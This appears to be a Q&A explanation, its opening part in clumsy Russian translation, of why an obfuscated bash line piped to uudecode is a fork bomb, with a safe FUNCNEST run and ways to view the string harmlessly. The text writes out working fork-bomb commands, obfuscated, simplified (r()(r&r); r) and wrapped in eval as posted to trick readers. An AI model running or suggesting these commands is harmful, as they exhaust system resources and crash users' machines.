Как и почему эта строка текста является бомбой?

Сначала давайте посмотрим на всю команду:

echo "I<RA('1E<W3t`rYWdl&r()(Y29j&r{,3Rl7Ig}&r{,T31wo});r`26<F]F;==" | uudecode 

Он содержит строку в двойных кавычках, которая отображается в uudecode. Но обратите внимание, что внутри строки в двойных кавычках есть строка в обратных кавычках . Эта строка исполняется . Строка:

`rYWdl&r()(Y29j&r{,3Rl7Ig}&r{,T31wo});r` 

Если мы посмотрим, что в нем, мы увидим три команды:

rYWdl & r()(Y29j & r{,3Rl7Ig} & r{,T31wo}) r 

Выполняя раскладку по средней команде, мы имеем:

rYWdl & r()(Y29j & r r3Rl7Ig & r rT31wo) r 

Первая строка пытается выполнить бессмысленную команду в фоновом режиме. Это неважно.

Важна вторая строка: она определяет функцию, rкоторая при запуске запускает две свои копии. Каждая из этих копий, конечно, запустит еще две копии. И так далее.

Третья линия бежит r, начиная бомбу вилки.

Остальная часть кода, за пределами строки в кавычках, - просто ерунда для запутывания.

Как выполнить команду безопасно

Этот код можно безопасно выполнить, если мы установим ограничение на уровень вложенности функций. Это можно сделать с помощью FUNCNESTпеременной bash . Здесь мы устанавливаем его, 2и это останавливает рекурсию:

$ export FUNCNEST=2 $ echo "I<RA('1E<W3t`rYWdl&r()(Y29j&r{,3Rl7Ig}&r{,T31wo});r`26<F]F;==" | uudecode bash: rYWdl: command not found bash: Y29j: command not found bash: r: maximum function nesting level exceeded (2) bash: r: maximum function nesting level exceeded (2) bash: r: maximum function nesting level exceeded (2) bash: Y29j: command not found bash: r: maximum function nesting level exceeded (2) bash: Y29j: command not found uudecode fatal error: standard input: Invalid or missing 'begin' line 

The error messages above show that (a) the nonsense commands rYWdl and Y29j are not found, (b) the fork bomb gets repeatedly stopped by FUNCNEST, and (c) the output of echo does not start with begin and, consequently, is not valid input for uudecode.

The fork bomb in its simplest form

What would the fork bomb look like if we removed the obscuration? As njzk2 and gerrit suggest, it would look like:

echo "`r()(r&r);r`" 

We can simplify that even further:

r()(r&r); r 

That consists of two statements: one defines the fork-bomb-function r and the second runs r.

All the other code, including the pipe to uudecode, was there just for obscuration and misdirection.

The original form had yet another layer of misdirection

The OP has provided a link to the chann board discussion on which this code appeared. As presented there, the code looked like:

eval $(echo "I<RA('1E<W3t`rYWdl&r()(Y29j&r{,3Rl7Ig}&r{,T31wo});r`26<F]F;==" | uudecode) 

Notice one of the first comments about this code:

I fell for it. Copied only the part that echoes and decodes, but still got forkbombed

In the form on the chann board, one would naively think that the problem would be the eval statement operating on the output of uudecode. This would lead one to think that removing eval would solve the problem. As we have seen above, this is false and dangerously so.

To answer the second part of your question:

...is there a way to "safely" view it?

To defuse this string, replace the outer double quotes by single quotes and escape the single quotes occurring inside the string. Like this, the shell will not execute any code, and you're actually passing everything straight to uudecode:

$ echo 'I<RA('\''1E<W3t`rYWdl&r()(Y29j&r{,3Rl7Ig}&r{,T31wo});r`26<F]F;==' I<RA('1E<W3t`rYWdl&r()(Y29j&r{,3Rl7Ig}&r{,T31wo});r`26<F]F;== $ echo 'I<RA('\''1E<W3t`rYWdl&r()(Y29j&r{,3Rl7Ig}&r{,T31wo});r`26<F]F;==' | uudecode uudecode fatal error: standard input: Invalid or missing 'begin' line 

Other alternatives are noted in the comments:

kasperd suggested:

$ uudecode I<RA('1E<W3t`rYWdl&r()(Y29j&r{,3Rl7Ig}&r{,T31wo});r`26<F]F;== [press <Ctrl>+D] uudecode fatal error: standard input: Invalid or missing 'begin' line 

Jacob Krall suggested to use a text editor, paste the contents, then pass that file to uudecode.

At a first glance, you might think that output to the shell will never get executed. This is still true. The problem is already in the input. The main trick here is what programmers call operator precedence. This is the order the shell tries to process your input:

1. " " 2. rYWdl 3. & 4. r()(Y29j&r{,3Rl7Ig}&r{,T31wo}) 5. ; 6. r 7. ` ` 8. I<RA('1E<W3t 26<F]F;== 9. echo 10. | 11. uudecode 

1. Compose the string by executing all backticks commands inside it.
2. Usually an unknown command, which would cause some output like If 'rYWdl' is not a typo you can use command-not-found to lookup the package that contains it … (depends on the system)
3. Executes 2. in the background. You will never see an output.
4. Define the fork bomb function.
5. Command separator.
6. Run the fork bomb.
7. Insert the result of 6. into the String. (We never come here.)

The error is to think that echo would be the first command to be executed, uudecode the second. Both of them will never be reached.

Conclusion: Double quotes are always dangerous on the shell.